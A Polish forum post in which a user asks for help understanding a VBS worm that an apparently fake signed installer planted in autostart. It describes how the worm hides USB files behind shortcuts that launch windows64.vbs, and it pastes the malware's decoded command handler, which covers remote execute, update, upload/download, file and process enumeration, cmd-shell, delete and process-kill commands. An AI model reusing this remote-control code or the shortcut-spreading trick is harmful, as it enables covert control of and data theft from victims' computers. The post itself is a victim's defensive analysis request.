Cześć, mam dość ciasno zabezpieczony komputer zewnętrzene oprogramowanie nie ma dostępu do sieci. ale 8 dni temu uruchomiłem instalator niby podpisany cyfrowo ale wbił mi plik VBS do auto-startu A przez te skrypty można łączyć sie z siecią za pomocą systemowych programów. Wczoraj zauważyłem to i sprawdziłem program to badziewie dodaje na wstępie przy samym fakcie uruchomienia instalatora.
Moim problemem jest że nie mogę/nie umiem przeanalizować tego skryptu. Tam są masowo zmienne Char Próbowałem je wyświetlić ale wychodzą tylko cyferki i gwiazdki.
To co wiem że program robi… Na pendrive Ukrywa oryginalne na nim pliki następnie tworzy skrót który uruchamia ten skrypt a po nim plik do którego jest jest sworzony skrót.
Np: C:\WINDOWS\system32\cmd.exe /c start windows64.vbs&start explorer System" “Volume” "Information&exit
Dodam że każdy plik folder jest automatycznie ukrywany i dodaje się skrót do tego pliku i folderu i automatyczne autouruchomienie pliku windows64
Bardzo ważne jest dla mnie co ten plik mógł zrobic z moimi plikami nie umiem przeczytać tego skryptu za dużo tam przeróbek w kodzie ASCII, ANSI. W ciagu tego tygodnia mogło mi się coś uszkodzić. A bardzo mi zależy aby szkody wykryć jak naszybciek a mam za duzo plików aby je pokolei sprawdzać.
Aby go rozkodować w pętli musiałem go odpalić, aby wszytkie znaki które są kodowane przepisały się od nowa.
Ale nie jestem głupi użyłem wirtualnej maszyny do wykonania tego.
Usunięty folder. w skanie nie widać dysku D bo go odłączyłem lepiej by było abym mial tam wszytkie pliki nie uszkodzone. Tylko gdyby ten wirus coś zrobił z nimi to chce wiedzieć co ten badziew może robić
Tutaj widać komendy które mogły być wysłane do kompa
między innymi:
Aktualizacja
Wysłanie pliku z i do komputera
chyba jakieś uruchomienia
to wydaje mi się są komendy jakie może ten łoś od wirusa wysłać wiem że napewno nie odbierał mój komputer tych komend Połączenia kompa tylko na wychodzące ustawione nie powiino dać się odebrać polecenia z sieci.
select case cmd (0)
case "excecute"
param = cmd (1)
execute param
case "update"
param = cmd (1)
oneonce.close
set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)
oneonce.write param
oneonce.close
shellobj.run "wscript.exe //b " & chr(34) & installdir & installname & chr(34)
wscript.quit
case "uninstall"
uninstall
case "send"
download cmd (1),cmd (2)
case "site-send"
sitedownloader cmd (1),cmd (2)
case "recv"
param = cmd (1)
upload (param)
case "enum-driver"
post "is-enum-driver",enumdriver
case "enum-faf"
param = cmd (1)
post "is-enum-faf",enumfaf (param)
case "enum-process"
post "is-enum-process",enumprocess
case "cmd-shell"
param = cmd (1)
post "is-cmd-shell",cmdshell (param)
case "delete"
param = cmd (1)
deletefaf (param)
case "exit-process"
param = cmd (1)
exitprocess (param)
case "sleep"
param = cmd (1)
sleep = eval (param)
end select
no oczywiście wiemy też że się powiela i ustawia skróty coś jeszcze?